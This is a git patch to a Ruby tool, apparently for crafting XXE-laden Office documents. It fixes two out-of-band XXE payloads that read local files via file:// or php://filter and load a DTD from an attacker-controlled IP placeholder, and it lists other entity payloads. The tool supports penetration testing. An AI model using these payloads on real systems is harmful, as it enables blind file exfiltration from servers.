From 1a2cfd0376d3ddf8d846b910f13a99dc4d17038d Mon Sep 17 00:00:00 2001
From: Robert Vulpe <nytr0gen.george@gmail.com>
Date: Thu, 11 Mar 2021 14:53:22 +0200
Subject: [PATCH] fixed oob payloads, small updates

---
 model/master.rb => lib/model.rb | 0
 server.rb                       | 9 ++++-----
 views/list.haml                 | 2 +-
 3 files changed, 5 insertions(+), 6 deletions(-)
 rename model/master.rb => lib/model.rb (100%)

diff --git a/model/master.rb b/lib/model.rb
similarity index 100%
rename from model/master.rb
rename to lib/model.rb
diff --git a/server.rb b/server.rb
index 4ac410a..3d0d0bd 100644
--- a/server.rb
+++ b/server.rb
@@ -8,7 +8,7 @@
 require 'json'
 
 require './lib/util'
-require './model/master'
+require './lib/model'
 
 if not File.file?('./db/master.db')
     puts "|+| Database does not exist, initializing a blank one."
@@ -18,7 +18,6 @@
 end
 
 # TODO apply to all xml in docx
-# TODO OOB is incorrect
 # TODO explain each menu item in help
 # TODO soft link content types
 
@@ -36,8 +35,8 @@ def read_payloads()
 	pl["Canary Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % xxe "test"> %xxe;]>', "A parameter entity check. This is valuable because the entity is checked immediately when the DOCTYPE is parsed. No malicious application but useful to check for."]
 	pl["Plain External Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a SYSTEM "FILE"> %a;]>', "A simple external parameter entity. Note, the file is the value for the payload; IP and PROTOCOL are ignored by OXML XXE. Useful because the entity is checked immediately when the DOCTYPE is parsed. "]
 	pl["Recursive Parameter Entity"] = ['<!DOCTYPE root [<!ENTITY % a "PARAMETER"> <!ENTITY % b "RECURSIVE %a;"> %b;]>',"Technically recursive parameter entities are not allowed by the XML spec. Should never work. Precursor to the billion laughs attack."]
-	pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. See References."]
-	pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%a;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
+	pl["Out of Bounds Attack (using file://)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "file://FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the file:// protocol. Details about building the dtd file at https://portswigger.net/web-security/xxe/blind."]
+	pl["Out of Bounds Attack (using php://filter)"] = ['<!DOCTYPE root [<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=FILE"><!ENTITY % dtd SYSTEM "IP">%dtd;]>',"OOB is a useful technique to exfiltrate files when attacking blind. This is accomplished by leveraging the php filter \"convert.base64-encode\", which has been available since PHP 5.0.0. See References."]
 	return pl
 end
 
@@ -232,7 +231,7 @@ def oxml_file_defaults()
 end
 
 get '/list' do
-	@files = Oxfile.all()
+	@files = Oxfile.all(:order => :id.desc)
 
 	haml :list
 end
diff --git a/views/list.haml b/views/list.haml
index e978a2b..65fe124 100644
--- a/views/list.haml
+++ b/views/list.haml
@@ -1,6 +1,6 @@
 .span5
   %br
-  %h3 List Created Files
+  %h3 List Created Files (Sorted by Date Desc)
   %table{:style => 'width: 70%;'}
     %tbody
       %tr